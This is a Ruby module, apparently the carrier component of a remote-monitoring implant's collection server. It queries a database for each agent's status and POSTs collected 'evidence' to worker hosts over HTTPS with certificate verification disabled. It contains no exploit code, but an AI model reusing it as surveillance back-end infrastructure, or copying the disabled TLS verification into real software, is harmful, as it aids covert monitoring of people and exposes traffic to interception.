# # Evidence Transfer module for transferring evidence to the db # # from RCS::Common require 'rcs-common/trace' require 'rcs-common/fixnum' require 'rcs-common/symbolize' require 'rcs-common/path_utils' require 'rcs-common/systemstatus' require_release 'rcs-collector/db' require_release 'rcs-collector/evidence_manager' # from system require 'thread' module RCS module Carrier class EvidenceTransfer include Singleton include RCS::Tracer include SystemStatusMixin def initialize @workers = {} @http = {} @threads = Hash.new end def self.run instance.run end def run # infinite loop for working loop do # pass the control to other threads sleep 1 # don't try to transfer if the db is down next unless DB.instance.connected? # for each instance get the ids we have and send them EvidenceManager.instance.instances.each do |instance| # get the info and evidence from the instance evidence, info = get_evidence(instance) next if evidence.empty? or info.nil? # one thread per instance, but check if an instance is already processing @threads[instance] ||= Thread.new do begin trace :info, "Transferring evidence for: #{instance}" # make sure that the symbols are present # we are doing this hack since we are passing information taken from the store # and passing them as they were a session sess = info.symbolize sess[:demo] = (sess[:demo] == 1) ? true : false # ask the database the id of the agent status, agent_id = DB.instance.agent_status(sess[:ident], sess[:instance], sess[:platform], sess[:demo], sess[:level]) sess[:bid] = agent_id case status when DB::DELETED_AGENT, DB::NO_SUCH_AGENT, DB::CLOSED_AGENT trace :info, "[#{instance}] has status (#{status}) deleting repository" EvidenceManager.instance.purge(instance, {force: true}) when DB::QUEUED_AGENT, DB::UNKNOWN_AGENT trace :warn, "[#{instance}] was queued, not transferring evidence" when DB::ACTIVE_AGENT raise "agent _id cannot be ZERO" if agent_id == 0 # update the status in the db if it was offline when syncing DB.instance.sync_update sess, info['version'], info['user'], info['device'], info['source'], info['sync_time'] # transfer all the evidence while (id = evidence.shift) self.transfer instance, id, evidence.count end end rescue SocketError, PersistentHTTP::Error => e change_status(:error, "Cannot reach worker") trace(:error, "Cannot reach worker: [#{e.class}] #{e.message}") rescue Exception => e change_status(:error, "Error processing evidence: [#{e.class}] #{e.message}") trace(:error, "Error processing evidence") ensure trace :debug, "Job for #{instance} is over (#{@threads.keys.size}/#{Thread.list.count} working threads)" # job done, exit @threads.delete(instance) Thread.kill Thread.current end end end end rescue Exception => e trace :error, "Evidence transfer error: #{e.message}" retry end def threads @threads.size end def get_evidence(instance) info = EvidenceManager.instance.instance_info instance EvidenceManager.instance.purge(instance, {force: true}) if info.nil? # get all the ids of the evidence for this instance evidence = EvidenceManager.instance.evidence_ids(instance) return evidence, info end def transfer(instance, id, left) evidence = EvidenceManager.instance.get_evidence(id, instance) raise "evidence to be transferred is nil" if evidence.nil? address = get_worker_address(instance) raise "invalid worker address" unless address ret, error, action = send_evidence(address, instance, evidence) if ret trace :info, "Evidence sent to db [#{instance}] #{evidence.size.to_s_bytes} - #{left} left to send" StatsManager.instance.add ev_output: 1, ev_output_size: evidence.size EvidenceManager.instance.del_evidence(id, instance) if action == :delete else trace :error, "Evidence NOT sent to db [#{instance}]: #{error}" EvidenceManager.instance.del_evidence(id, instance) if action == :delete end end def get_worker_address(instance) return @workers[instance] if @workers[instance] address = DB.instance.get_worker(instance) trace :info, "Worker address for #{instance} is #{address}" @workers[instance] = address end def send_evidence(address, instance, evidence) host, port = address.split(':') http = @http[address] ||= PersistentHTTP.new( :name => 'PersistentToWorker' + address, :pool_size => 20, :host => host, :port => port, :use_ssl => true, :read_timeout => 300, :verify_mode => OpenSSL::SSL::VERIFY_NONE ) request = Net::HTTP::Post.new("/evidence/#{instance}") request.body = evidence ret = http.request(request) case ret when Net::HTTPSuccess then return true, "OK", :delete when Net::HTTPConflict then return false, "empty evidence", :delete end return false, ret.body rescue Exception => e trace :error, "Cannot send evidence to #{address}: #{e.class} #{e.message}" #trace :fatal, e.backtrace raise end end end #Collector:: end #RCS:: .